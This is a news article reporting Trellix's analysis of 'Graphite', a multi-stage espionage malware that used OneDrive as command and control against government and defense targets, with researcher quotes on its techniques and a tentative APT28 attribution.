Trellix finds OneDrive malware targeting government officials in Western Asia

Researchers with Trellix named the malware "Graphite" because it uses Microsoft's Graph API to leverage OneDrive as a command and control server.
Written by Jonathan Greig, Contributor

Hackers are using Microsoft OneDrive in a multi-stage espionage campaign aimed at high-ranking government officials in Western Asia, according to a new report from Trellix. 

Researchers with Trellix named the malware involved "Graphite" because it uses Microsoft's Graph API to leverage OneDrive as a command and control server. The attack takes advantage of an MSHTML remote code execution vulnerability (CVE-2021-40444) to execute a malicious executable in memory, according to Trellix.

"As seen in the analysis of the Graphite malware, one quite innovative functionality is the use of the OneDrive service as a Command and Control through querying the Microsoft Graph API with a hardcoded token in the malware. This type of communication allows the malware to go unnoticed in the victims' systems since it will only connect to legitimate Microsoft domains and won't show any suspicious network traffic," Trellix explained. 

Christiaan Beek, lead scientist at Trellix Threat Labs, told ZDNet that he was surprised to see Microsoft OneDrive used as a Command and Control Server mechanism, noting that it was "a novel way of quickly interacting with the infected machines by dragging the encrypted commands into the victim's folders."

"Next OneDrive would sync with the victim's machines and encrypted commands being executed, whereafter the requested info was encrypted and sent back to the OneDrive of the attacker," Beek said, adding that what stood out most to him was "the multi-stage approach with a novel technique, multiple malware samples and the operational security of the actor."

Beek noted that the attack was successful but would not share more information about the hackers' goals, saying the investigation is still ongoing. The attack was prepared in July 2021 and eventually deployed between September and November 5, according to the Trellix report. 

Trellix's Marc Elias said it targeted "government officials overseeing national security policy and individuals in the defense industry."

Elias wrote that the attack is split into multiple stages so that it stays as hidden as possible and said that while attribution was difficult, there was some evidence as to the potential culprit. 

"A number of the attack indicators and apparent geopolitical objectives resemble those associated with the previously uncovered threat actor APT28. While we don't believe in attributing any campaign solely based on such evidence, we have a moderate level of confidence that our assumption is accurate," Elias wrote. "That said, we are supremely confident that we are dealing with a very skilled actor based on how infrastructure, malware coding and operation were setup."

The first stage of the attack "likely" involves a spear-phishing email aiming to lure victims into opening an Excel file named "parliament_rew.xlsx."

Other techniques help the attacker to get around some antivirus scanning engines and office analysis tools, allowing it to continue undetected. 

"It is very likely that the developers of Graphite used the Empire OneDrive Stager as a reference due to the similarities of the functionality and the file structure used in the OneDrive account of the actors," the study explained. 

"One of the lure documents we mentioned before (named 'parliament_rew.xlsx') might have been aimed for targeting government employees. Besides targeting government entities, it appears this adversary also has its sights on the defense industry. Another document with the name 'Missions Budget.xlsx' contained the text 'Military and civilian missions and operations' and the budgets in dollars for the military operations in some countries for the years 2022 and 2023."

From their telemetry, they discovered that Poland and other Eastern European countries were of interest to the hackers and noted that the lure documents "show its activities are centered in specific regions and industries." 

The report notes that the attacks occurred during the border tensions between Armenia and Azerbaijan. The hackers behind the project worked only worked from Monday to Friday, according to Trellix, and the timestamps show they only worked during normal business hours in the GMT+3 time zone, which includes Moscow Time, Turkey Time, Arabia Standard Time and East Africa Time.

"Another interesting discovery during the investigation was that the attackers were using the CLSID (D9144DCD-E998-4ECA-AB6A-DCD83CCBA16D) for persistence, which matched with an ESET report in which researchers mentioned a Russian Operation targeting Eastern European countries. Analyzing and comparing code-blocks and sequences from the graphite malware with our database of samples, we discovered overlap with samples in 2018 being attributed to APT28," Trellix explained. 

"Although we mentioned some tactics, techniques and procedures (TTPs) of the actors behind this campaign, we simply do not have enough context, similarities or overlap to point us with low/moderate confidence towards APT28, let alone a nation-state sponsor. However, we believe we are dealing with a skilled actor based on how the infrastructure, malware coding and operation was setup."

Editorial standards